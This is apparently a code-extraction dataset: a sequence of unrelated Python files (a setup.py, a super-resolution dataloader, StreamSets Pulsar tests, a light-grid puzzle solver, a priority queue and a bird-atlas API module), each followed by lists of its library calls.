'np.zeros', (['(9)'], {}), '(9)\n', (8761, 8764), True, 'import numpy as np\n'), ((8795, 8806), 'numpy.zeros', 'np.zeros', (['(9)'], {}), '(9)\n', (8803, 8806), True, 'import numpy as np\n'), ((8949, 8968), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(9)'], {}), '(aug, 9)\n', (8960, 8968), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((9083, 9100), 'numpy.zeros', 'np.zeros', (['(6, 10)'], {}), '((6, 10))\n', (9091, 9100), True, 'import numpy as np\n'), ((9906, 9932), 'numpy.array', 'np.array', (['[-1, -1, -1, -1]'], {}), '([-1, -1, -1, -1])\n', (9914, 9932), True, 'import numpy as np\n'), ((9516, 9526), 'numpy.eye', 'np.eye', (['(10)'], {}), '(10)\n', (9522, 9526), True, 'import numpy as np\n')]
|
from setuptools import setup
try:
from g1.devtools import buildtools
except ImportError:
buildtools = None
import startup
if buildtools:
cmdclass = {
'bdist_zipapp': buildtools.make_bdist_zipapp(main_optional=True),
}
else:
cmdclass = {}
setup(
name = 'startup',
version = startup.__version__,
description = 'A dependency graph resolver for program startup',
long_description = startup.__doc__,
author = startup.__author__,
author_email = startup.__author_email__,
license = startup.__license__,
url = 'https://github.com/clchiou/startup',
cmdclass = cmdclass,
py_modules = ['startup'],
test_suite = 'tests',
platforms = '*',
classifiers = [
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
[
"g1.devtools.buildtools.make_bdist_zipapp",
"setuptools.setup"
] |
[((272, 958), 'setuptools.setup', 'setup', ([], {'name': '"""startup"""', 'version': 'startup.__version__', 'description': '"""A dependency graph resolver for program startup"""', 'long_description': 'startup.__doc__', 'author': 'startup.__author__', 'author_email': 'startup.__author_email__', 'license': 'startup.__license__', 'url': '"""https://github.com/clchiou/startup"""', 'cmdclass': 'cmdclass', 'py_modules': "['startup']", 'test_suite': '"""tests"""', 'platforms': '"""*"""', 'classifiers': "['Development Status :: 1 - Planning', 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3 :: Only',\n 'Topic :: Software Development :: Libraries :: Python Modules']"}), "(name='startup', version=startup.__version__, description=\n 'A dependency graph resolver for program startup', long_description=\n startup.__doc__, author=startup.__author__, author_email=startup.\n __author_email__, license=startup.__license__, url=\n 'https://github.com/clchiou/startup', cmdclass=cmdclass, py_modules=[\n 'startup'], test_suite='tests', platforms='*', classifiers=[\n 'Development Status :: 1 - Planning', 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3 :: Only',\n 'Topic :: Software Development :: Libraries :: Python Modules'])\n", (277, 958), False, 'from setuptools import setup\n'), ((190, 238), 'g1.devtools.buildtools.make_bdist_zipapp', 'buildtools.make_bdist_zipapp', ([], {'main_optional': '(True)'}), '(main_optional=True)\n', (218, 238), False, 'from g1.devtools import buildtools\n')]
|
import os
from datas.benchmark import Benchmark
from datas.div2k import DIV2K
from torch.utils.data import DataLoader
def create_datasets(args):
div2k = DIV2K(
os.path.join(args.data_path, 'DIV2K/DIV2K_train_HR'),
os.path.join(args.data_path, 'DIV2K/DIV2K_train_LR_bicubic'),
os.path.join(args.data_path, 'div2k_cache'),
train=True,
augment=args.data_augment,
scale=args.scale,
colors=args.colors,
patch_size=args.patch_size,
repeat=args.data_repeat,
)
train_dataloader = DataLoader(dataset=div2k, num_workers=args.threads, batch_size=args.batch_size, shuffle=True, pin_memory=True, drop_last=True)
valid_dataloaders = []
if 'Set5' in args.eval_sets:
set5_hr_path = os.path.join(args.data_path, 'benchmark/Set5/HR')
set5_lr_path = os.path.join(args.data_path, 'benchmark/Set5/LR_bicubic')
set5 = Benchmark(set5_hr_path, set5_lr_path, scale=args.scale, colors=args.colors)
valid_dataloaders += [{'name': 'set5', 'dataloader': DataLoader(dataset=set5, batch_size=1, shuffle=False)}]
if 'Set14' in args.eval_sets:
set14_hr_path = os.path.join(args.data_path, 'benchmark/Set14/HR')
set14_lr_path = os.path.join(args.data_path, 'benchmark/Set14/LR_bicubic')
set14 = Benchmark(set14_hr_path, set14_lr_path, scale=args.scale, colors=args.colors)
valid_dataloaders += [{'name': 'set14', 'dataloader': DataLoader(dataset=set14, batch_size=1, shuffle=False)}]
if 'B100' in args.eval_sets:
b100_hr_path = os.path.join(args.data_path, 'benchmark/B100/HR')
b100_lr_path = os.path.join(args.data_path, 'benchmark/B100/LR_bicubic')
b100 = Benchmark(b100_hr_path, b100_lr_path, scale=args.scale, colors=args.colors)
valid_dataloaders += [{'name': 'b100', 'dataloader': DataLoader(dataset=b100, batch_size=1, shuffle=False)}]
if 'Urban100' in args.eval_sets:
u100_hr_path = os.path.join(args.data_path, 'benchmark/Urban100/HR')
u100_lr_path = os.path.join(args.data_path, 'benchmark/Urban100/LR_bicubic')
u100 = Benchmark(u100_hr_path, u100_lr_path, scale=args.scale, colors=args.colors)
valid_dataloaders += [{'name': 'u100', 'dataloader': DataLoader(dataset=u100, batch_size=1, shuffle=False)}]
if 'Manga109' in args.eval_sets:
manga_hr_path = os.path.join(args.data_path, 'benchmark/Manga109/HR')
manga_lr_path = os.path.join(args.data_path, 'benchmark/Manga109/LR_bicubic')
manga = Benchmark(manga_hr_path, manga_lr_path, scale=args.scale, colors=args.colors)
valid_dataloaders += [{'name': 'manga109', 'dataloader': DataLoader(dataset=manga, batch_size=1, shuffle=False)}]
if len(valid_dataloaders) == 0:
print('select no dataset for evaluation!')
else:
selected = ''
for i in range(1, len(valid_dataloaders)):
selected += ", " + valid_dataloaders[i]['name']
print('select {} for evaluation! '.format(selected))
return train_dataloader, valid_dataloaders
|
[
"datas.benchmark.Benchmark",
"os.path.join",
"torch.utils.data.DataLoader"
] |
[((566, 697), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'div2k', 'num_workers': 'args.threads', 'batch_size': 'args.batch_size', 'shuffle': '(True)', 'pin_memory': '(True)', 'drop_last': '(True)'}), '(dataset=div2k, num_workers=args.threads, batch_size=args.\n batch_size, shuffle=True, pin_memory=True, drop_last=True)\n', (576, 697), False, 'from torch.utils.data import DataLoader\n'), ((174, 226), 'os.path.join', 'os.path.join', (['args.data_path', '"""DIV2K/DIV2K_train_HR"""'], {}), "(args.data_path, 'DIV2K/DIV2K_train_HR')\n", (186, 226), False, 'import os\n'), ((237, 297), 'os.path.join', 'os.path.join', (['args.data_path', '"""DIV2K/DIV2K_train_LR_bicubic"""'], {}), "(args.data_path, 'DIV2K/DIV2K_train_LR_bicubic')\n", (249, 297), False, 'import os\n'), ((308, 351), 'os.path.join', 'os.path.join', (['args.data_path', '"""div2k_cache"""'], {}), "(args.data_path, 'div2k_cache')\n", (320, 351), False, 'import os\n'), ((781, 830), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Set5/HR"""'], {}), "(args.data_path, 'benchmark/Set5/HR')\n", (793, 830), False, 'import os\n'), ((854, 911), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Set5/LR_bicubic"""'], {}), "(args.data_path, 'benchmark/Set5/LR_bicubic')\n", (866, 911), False, 'import os\n'), ((928, 1003), 'datas.benchmark.Benchmark', 'Benchmark', (['set5_hr_path', 'set5_lr_path'], {'scale': 'args.scale', 'colors': 'args.colors'}), '(set5_hr_path, set5_lr_path, scale=args.scale, colors=args.colors)\n', (937, 1003), False, 'from datas.benchmark import Benchmark\n'), ((1179, 1229), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Set14/HR"""'], {}), "(args.data_path, 'benchmark/Set14/HR')\n", (1191, 1229), False, 'import os\n'), ((1254, 1312), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Set14/LR_bicubic"""'], {}), "(args.data_path, 'benchmark/Set14/LR_bicubic')\n", (1266, 1312), False, 'import os\n'), ((1329, 1406), 'datas.benchmark.Benchmark', 'Benchmark', (['set14_hr_path', 'set14_lr_path'], {'scale': 'args.scale', 'colors': 'args.colors'}), '(set14_hr_path, set14_lr_path, scale=args.scale, colors=args.colors)\n', (1338, 1406), False, 'from datas.benchmark import Benchmark\n'), ((1582, 1631), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/B100/HR"""'], {}), "(args.data_path, 'benchmark/B100/HR')\n", (1594, 1631), False, 'import os\n'), ((1655, 1712), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/B100/LR_bicubic"""'], {}), "(args.data_path, 'benchmark/B100/LR_bicubic')\n", (1667, 1712), False, 'import os\n'), ((1729, 1804), 'datas.benchmark.Benchmark', 'Benchmark', (['b100_hr_path', 'b100_lr_path'], {'scale': 'args.scale', 'colors': 'args.colors'}), '(b100_hr_path, b100_lr_path, scale=args.scale, colors=args.colors)\n', (1738, 1804), False, 'from datas.benchmark import Benchmark\n'), ((1982, 2035), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Urban100/HR"""'], {}), "(args.data_path, 'benchmark/Urban100/HR')\n", (1994, 2035), False, 'import os\n'), ((2059, 2120), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Urban100/LR_bicubic"""'], {}), "(args.data_path, 'benchmark/Urban100/LR_bicubic')\n", (2071, 2120), False, 'import os\n'), ((2137, 2212), 'datas.benchmark.Benchmark', 'Benchmark', (['u100_hr_path', 'u100_lr_path'], {'scale': 'args.scale', 'colors': 'args.colors'}), '(u100_hr_path, u100_lr_path, scale=args.scale, colors=args.colors)\n', (2146, 2212), False, 'from datas.benchmark import Benchmark\n'), ((2391, 2444), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Manga109/HR"""'], {}), "(args.data_path, 'benchmark/Manga109/HR')\n", (2403, 2444), False, 'import os\n'), ((2469, 2530), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Manga109/LR_bicubic"""'], {}), "(args.data_path, 'benchmark/Manga109/LR_bicubic')\n", (2481, 2530), False, 'import os\n'), ((2547, 2624), 'datas.benchmark.Benchmark', 'Benchmark', (['manga_hr_path', 'manga_lr_path'], {'scale': 'args.scale', 'colors': 'args.colors'}), '(manga_hr_path, manga_lr_path, scale=args.scale, colors=args.colors)\n', (2556, 2624), False, 'from datas.benchmark import Benchmark\n'), ((1065, 1118), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'set5', 'batch_size': '(1)', 'shuffle': '(False)'}), '(dataset=set5, batch_size=1, shuffle=False)\n', (1075, 1118), False, 'from torch.utils.data import DataLoader\n'), ((1469, 1523), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'set14', 'batch_size': '(1)', 'shuffle': '(False)'}), '(dataset=set14, batch_size=1, shuffle=False)\n', (1479, 1523), False, 'from torch.utils.data import DataLoader\n'), ((1866, 1919), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'b100', 'batch_size': '(1)', 'shuffle': '(False)'}), '(dataset=b100, batch_size=1, shuffle=False)\n', (1876, 1919), False, 'from torch.utils.data import DataLoader\n'), ((2274, 2327), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'u100', 'batch_size': '(1)', 'shuffle': '(False)'}), '(dataset=u100, batch_size=1, shuffle=False)\n', (2284, 2327), False, 'from torch.utils.data import DataLoader\n'), ((2690, 2744), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'manga', 'batch_size': '(1)', 'shuffle': '(False)'}), '(dataset=manga, batch_size=1, shuffle=False)\n', (2700, 2744), False, 'from torch.utils.data import DataLoader\n')]
|
# Copyright 2020 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import string
import pytest
from pulsar import MessageId
from streamsets.testframework.decorators import stub
from streamsets.testframework.markers import pulsar, sdc_min_version
from streamsets.testframework.utils import get_random_string
import json
logger = logging.getLogger(__name__)
# Topics are URLs so we have to respect URL specs
TOPIC_NAMES = [
('lowercase', get_random_string(string.ascii_lowercase)),
('uppercase', get_random_string(string.ascii_uppercase)),
('letters', get_random_string(string.ascii_letters)),
('digits', get_random_string(string.digits)),
('hexadecimal', get_random_string(string.hexdigits).lower()),
('hypen', get_random_string() + '-' + get_random_string()),
('start_hypen', '-' + get_random_string()),
('end_hypen', get_random_string() + '-'),
('underscore', get_random_string() + '_' + get_random_string()),
('start_underscore', get_random_string() + '_'),
('end_underscore', '_' + get_random_string()),
('dot', get_random_string() + '.' + get_random_string()),
('start_dot', '.' + get_random_string()),
('end_dot', get_random_string() + '.')
]
@pulsar
def test_data_types(sdc_builder, sdc_executor, pulsar):
pytest.skip("Pulsar isn't a typed data store")
@pulsar
@pytest.mark.parametrize('test_name, topic_name', TOPIC_NAMES, ids=[t[0] for t in TOPIC_NAMES])
def test_object_names_topic(sdc_builder, sdc_executor, pulsar, test_name, topic_name, keep_data):
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('Dev Raw Data Source')
source.data_format = 'TEXT'
source.raw_data = 'Hi!'
source.stop_after_first_batch = True
producer = builder.add_stage('Pulsar Producer')
producer.topic = topic_name
producer.data_format = 'TEXT'
source >> producer
pipeline = builder.build().configure_for_environment(pulsar)
pipeline.configuration['rateLimit'] = 1
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
messages = _dump_messages_and_clean_up(topic_name, pulsar, keep_data)
assert messages == ["Hi!"]
@pulsar
def test_dataflow_events(sdc_builder, sdc_executor, pulsar):
pytest.skip('Pulsar Origin does not produce events')
@pulsar
def test_multiple_batch(sdc_builder, sdc_executor, pulsar, keep_data):
batch_size = 100
batches = 10
topic = get_random_string()
builder = sdc_builder.get_pipeline_builder()
origin = builder.add_stage('Dev Data Generator')
origin.batch_size = batch_size
origin.delay_between_batches = 0
origin.fields_to_generate = [{
"type": "LONG_SEQUENCE",
"field": "seq"
}]
producer = builder.add_stage('Pulsar Producer')
producer.topic = topic
producer.data_format = 'JSON'
producer.async_send = False
origin >> producer
pipeline = builder.build().configure_for_environment(pulsar)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline)
sdc_executor.wait_for_pipeline_metric(pipeline, 'input_record_count', batch_size * batches)
sdc_executor.stop_pipeline(pipeline)
history = sdc_executor.get_pipeline_history(pipeline)
recordsCount = history.latest.metrics.counter('pipeline.batchInputRecords.counter').count
logger.info(f"Wrote {recordsCount} records")
messages = _dump_messages_and_clean_up(topic, pulsar, keep_data)
sequence = [int(json.loads(m)['seq']) for m in messages]
assert sorted(sequence) == [*range(0, recordsCount)]
@pulsar
def test_push_pull(sdc_builder, sdc_executor, cluster):
pytest.skip("We haven't re-implemented this test since Dev Data Generator (push) is art of test_multiple_batches and Dev Raw Data Source (pull) is part of test_data_types.")
@stub
def test_data_format_binary(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_delimited(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_json(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_protobuf(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_text(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_sdc_record(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_xml(sdc_builder, sdc_executor):
pass
def _dump_messages_and_clean_up(topic_name, pulsar, keep_data):
msgs_received = []
client = pulsar.client
admin = pulsar.admin
try:
reader = client.create_reader(topic_name, MessageId.earliest)
while reader.has_message_available():
msgs_received.append(reader.read_next().data().decode().strip()) # strip to remove newlines
finally:
reader.close() # reader needs to be closed before topic can be deleted without force
client.close()
if not keep_data:
admin.delete_topic(reader.topic())
logger.debug('Number of messages received from Pulsar = %d', len(msgs_received))
return msgs_received
|
[
"json.loads",
"pytest.skip",
"streamsets.testframework.utils.get_random_string",
"pytest.mark.parametrize",
"logging.getLogger"
] |
[((858, 885), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (875, 885), False, 'import logging\n'), ((1863, 1961), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""test_name, topic_name"""', 'TOPIC_NAMES'], {'ids': '[t[0] for t in TOPIC_NAMES]'}), "('test_name, topic_name', TOPIC_NAMES, ids=[t[0] for\n t in TOPIC_NAMES])\n", (1886, 1961), False, 'import pytest\n'), ((1805, 1851), 'pytest.skip', 'pytest.skip', (['"""Pulsar isn\'t a typed data store"""'], {}), '("Pulsar isn\'t a typed data store")\n', (1816, 1851), False, 'import pytest\n'), ((2798, 2850), 'pytest.skip', 'pytest.skip', (['"""Pulsar Origin does not produce events"""'], {}), "('Pulsar Origin does not produce events')\n", (2809, 2850), False, 'import pytest\n'), ((2982, 3001), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (2999, 3001), False, 'from streamsets.testframework.utils import get_random_string\n'), ((4192, 4375), 'pytest.skip', 'pytest.skip', (['"""We haven\'t re-implemented this test since Dev Data Generator (push) is art of test_multiple_batches and Dev Raw Data Source (pull) is part of test_data_types."""'], {}), '(\n "We haven\'t re-implemented this test since Dev Data Generator (push) is art of test_multiple_batches and Dev Raw Data Source (pull) is part of test_data_types."\n )\n', (4203, 4375), False, 'import pytest\n'), ((971, 1012), 'streamsets.testframework.utils.get_random_string', 'get_random_string', (['string.ascii_lowercase'], {}), '(string.ascii_lowercase)\n', (988, 1012), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1033, 1074), 'streamsets.testframework.utils.get_random_string', 'get_random_string', (['string.ascii_uppercase'], {}), '(string.ascii_uppercase)\n', (1050, 1074), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1093, 1132), 'streamsets.testframework.utils.get_random_string', 'get_random_string', (['string.ascii_letters'], {}), '(string.ascii_letters)\n', (1110, 1132), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1150, 1182), 'streamsets.testframework.utils.get_random_string', 'get_random_string', (['string.digits'], {}), '(string.digits)\n', (1167, 1182), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1293, 1312), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1310, 1312), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1341, 1360), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1358, 1360), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1381, 1400), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1398, 1400), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1456, 1475), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1473, 1475), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1503, 1522), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1520, 1522), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1560, 1579), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1577, 1579), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1622, 1641), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1639, 1641), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1668, 1687), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1685, 1687), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1706, 1725), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1723, 1725), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1205, 1240), 'streamsets.testframework.utils.get_random_string', 'get_random_string', (['string.hexdigits'], {}), '(string.hexdigits)\n', (1222, 1240), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1265, 1284), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1282, 1284), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1428, 1447), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1445, 1447), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1594, 1613), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1611, 1613), False, 'from streamsets.testframework.utils import get_random_string\n'), ((4024, 4037), 'json.loads', 'json.loads', (['m'], {}), '(m)\n', (4034, 4037), False, 'import json\n')]
|
# import pyautogui
#
# pyautogui.typewrite('akasjhaks')
from pathlib import Path
unique = []
with open(Path("C:/Users/christiano/Downloads/Untitled-AB.txt"), 'r') as f:
for line in f:
line = line.strip()
if line not in unique:
unique.append(line)
print(line)
|
[
"pathlib.Path"
] |
[((105, 158), 'pathlib.Path', 'Path', (['"""C:/Users/christiano/Downloads/Untitled-AB.txt"""'], {}), "('C:/Users/christiano/Downloads/Untitled-AB.txt')\n", (109, 158), False, 'from pathlib import Path\n')]
|
import re
grid = []
size = 1000
class Grid:
def __init__(self, size):
self.size = size
self.grid = [ [0]*size for e in range(size) ]
print(f'Initiated a {size}*{size} grid.')
def turnOn(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] = 1
def turnOff(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] = 0
def toggle(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] = 1 - self.grid[x][y]
def processInstruction(self, instruction):
print(f'process instruction "{instruction}"')
coordinates = re.findall(r'(\d+),(\d+) through (\d+),(\d+)', instruction)[0]
xstart, ystart, xend, yend = map(int, coordinates)
if (instruction[1] == 'o'): #t*o*ggle
return self.toggle(xstart, ystart, xend, yend)
if (instruction[6] == 'f'): #turn o*f*f
return self.turnOff(xstart, ystart, xend, yend)
if (instruction[6] == 'n'): #turn o*n*
return self.turnOn(xstart, ystart, xend, yend)
def countLights(self):
return sum(map(sum, self.grid))
def debug(self):
for x in range(size):
print(self.grid[x])
print('-'*2*size)
class GridTwo(Grid):
def turnOn(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] += 1
def turnOff(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] = max(self.grid[x][y] - 1, 0)
def toggle(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] = 2 + self.grid[x][y]
grid = Grid(size)
grid2 = GridTwo(size)
with open(__file__+'.input', "r+") as file:
inputStr = file.read()
for instruction in filter(None, inputStr.split('\n')):
grid.processInstruction(instruction)
grid2.processInstruction(instruction)
print(f'PART1 : {grid.countLights()}')
print(f'PART2 : {grid2.countLights()}')
|
[
"re.findall"
] |
[((877, 939), 're.findall', 're.findall', (['"""(\\\\d+),(\\\\d+) through (\\\\d+),(\\\\d+)"""', 'instruction'], {}), "('(\\\\d+),(\\\\d+) through (\\\\d+),(\\\\d+)', instruction)\n", (887, 939), False, 'import re\n')]
|
# -*- coding: utf-8 -*-
'''
Module containing classes related to enforcing orderings upon messages.
'''
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import Queue
import threading
import time
from .exception import QueueClearingException
def _cur_time():
'''Returns the current monotonic time in milliseconds.'''
return time.clock_gettime(time.CLOCK_MONOTONIC_RAW) * 1000000
class EventOrderer(object):
'''In memory priority queue to order messages'''
_EMWA_CONSTANT = 0.9
def __init__(self, max_wind):
super(EventOrderer, self).__init__()
self.priority_queue = Queue.PriorityQueue()
self.q_over_min = threading.Condition()
self.max_wind = max_wind
self.last_time = _cur_time()
self.inter = 1
self.min_inter = 100000
self.clearing = False
def _update_inter(self):
'''Update the queues interval count.'''
t_now = _cur_time()
t_diff = (t_now - self.last_time)
self.last_time = t_now
self.inter = (self.inter * self._EMWA_CONSTANT +
t_diff * (1 - self._EMWA_CONSTANT))
if self.inter < self.min_inter:
self.min_inter = self.inter
def _window_size(self):
'''Return the current minimum window size.'''
return max(self.max_wind * (self.min_inter / self.inter),
self.max_wind)
def _extract_cond(self):
'''Evaluate the extraction condition, queue_size > min_window'''
return (self.clearing or
self.priority_queue.qsize() > self._window_size())
def push(self, msgs):
'''Push a list of messages msgs onto the queue.'''
with self.q_over_min:
if self.clearing:
raise QueueClearingException()
for (pri, val) in msgs:
self.priority_queue.put((pri, val), False)
self._update_inter()
if self._extract_cond():
self.q_over_min.notify()
def pop(self):
'''Pop the message from the queue with the lowest priority.'''
with self.q_over_min:
while not self._extract_cond():
self.q_over_min.wait()
item = self.priority_queue.get(False)
return item
def start_clear(self):
'''Clear the queue of message returning all remaining messages as a
list.'''
with self.q_over_min:
self.clearing = True
self.q_over_min.notify()
def stop_clear(self):
'''Stop a queue clear and resume normal activities.'''
with self.q_over_min:
self.clearing = False
def get_queue_size(self):
'''Returns queue size'''
return self.priority_queue.qsize()
|
[
"threading.Condition",
"time.clock_gettime",
"Queue.PriorityQueue"
] |
[((395, 439), 'time.clock_gettime', 'time.clock_gettime', (['time.CLOCK_MONOTONIC_RAW'], {}), '(time.CLOCK_MONOTONIC_RAW)\n', (413, 439), False, 'import time\n'), ((668, 689), 'Queue.PriorityQueue', 'Queue.PriorityQueue', ([], {}), '()\n', (687, 689), False, 'import Queue\n'), ((716, 737), 'threading.Condition', 'threading.Condition', ([], {}), '()\n', (735, 737), False, 'import threading\n')]
|
from dataclasses import replace
import atlas.common as common
import json
def observation_coordinates(square_id):
url = f"https://api.laji.fi/v0/warehouse/query/unit/list?selected=gathering.conversions.wgs84CenterPoint.lat%2Cgathering.conversions.wgs84CenterPoint.lon%2Cgathering.coordinatesVerbatim&pageSize=1000&page=1&cache=true&taxonId=MX.37580&useIdentificationAnnotations=true&includeSubTaxa=true&includeNonValidTaxa=true&time=2022%2F2025&individualCountMin=1&coordinates={square_id}%3AYKJ&qualityIssues=NO_ISSUES&atlasClass=MY.atlasClassEnumB%2CMY.atlasClassEnumC%2CMY.atlasClassEnumD&coordinateAccuracyMax=5000&access_token=";
data_dict = common.fetch_finbif_api(url)
obs_count = data_dict["total"]
coord_string = ""
for obs in data_dict["results"]:
# Todo: skip those with just center coordinates
# if (isset($obs['gathering']['coordinatesVerbatim'])) {
lat = obs['gathering']['conversions']['wgs84CenterPoint']['lat']
lon = obs['gathering']['conversions']['wgs84CenterPoint']['lon']
coord_string = coord_string + f"[{lat},{lon}],\n"
return coord_string, obs_count
def coordinate_accuracy_html_loop(data):
html = ""
for accuracy, count in data.items():
html = html + accuracy + " m: " + str(count) + " havaintoa, "
return html[0:-2]
def coordinate_accuracy_html(data):
over10000 = data.get("over", 0) + data.get("25000", 0) + data.get("10000", 0)
under10000 =data.get("5000", 0)
under1000 =data.get("1000", 0)
under100 = data.get("100", 0)
under10 = data.get("10", 0) + data.get("1", 0)
mappable = under10000 + under1000 + under100 + under10
total = over10000 + mappable
if 0 == total:
return "Ruutulta ei ole vielรค havaintoja"
mappable_percentage = round(mappable / total * 100, 1)
html = f"Kartalla nรคytetรครคn <strong>{mappable_percentage} %</strong> ruudun <strong>{total} havainnosta</strong>. Havaintojen mรครคrรค eri tarkkuusluokissa: "
html = html + "yli 10000 m: <strong>" + str(over10000) + "</strong>, "
html = html + "5000 m: <strong>" + str(under10000) + "</strong>, "
html = html + "1000 m: <strong>" + str(under1000) + "</strong>, "
html = html + "100 m: <strong>" + str(under100) + "</strong>, "
html = html + "alle 10 m: <strong>" + str(under10) + "</strong>, "
return html[0:-2]
def main(square_id_untrusted):
html = dict()
square_id = common.valid_square_id(square_id_untrusted)
html["square_id"] = square_id
neighbour_ids = common.neighbour_ids(square_id)
html["neighbour_ids"] = neighbour_ids
coordinates, mappable_obs_count = observation_coordinates(square_id)
html["coordinates"] = coordinates
html["mappable_obs_count"] = mappable_obs_count
coordinate_accuracy_data, total_obs_count = common.coordinate_accuracy_data(square_id)
html["accuracies"] = coordinate_accuracy_html(coordinate_accuracy_data)
# html["total_obs_count"] = collection_counts(square_id)
square_name, society, centerpoint, cornerpoints = common.square_info(square_id)
# Todo: Make heading the same way as on squareform
html["heading"] = f"{square_id} {square_name}"
html["centerpoint"] = centerpoint
html["cornerpoints"] = cornerpoints
return html
|
[
"atlas.common.coordinate_accuracy_data",
"atlas.common.square_info",
"atlas.common.neighbour_ids",
"atlas.common.fetch_finbif_api",
"atlas.common.valid_square_id"
] |
[((659, 687), 'atlas.common.fetch_finbif_api', 'common.fetch_finbif_api', (['url'], {}), '(url)\n', (682, 687), True, 'import atlas.common as common\n'), ((2448, 2491), 'atlas.common.valid_square_id', 'common.valid_square_id', (['square_id_untrusted'], {}), '(square_id_untrusted)\n', (2470, 2491), True, 'import atlas.common as common\n'), ((2547, 2578), 'atlas.common.neighbour_ids', 'common.neighbour_ids', (['square_id'], {}), '(square_id)\n', (2567, 2578), True, 'import atlas.common as common\n'), ((2834, 2876), 'atlas.common.coordinate_accuracy_data', 'common.coordinate_accuracy_data', (['square_id'], {}), '(square_id)\n', (2865, 2876), True, 'import atlas.common as common\n'), ((3069, 3098), 'atlas.common.square_info', 'common.square_info', (['square_id'], {}), '(square_id)\n', (3087, 3098), True, 'import atlas.common as common\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# created by <NAME>
# contact with <EMAIL>
import numpy as np
import datetime
import os
import pandas as pd
import random
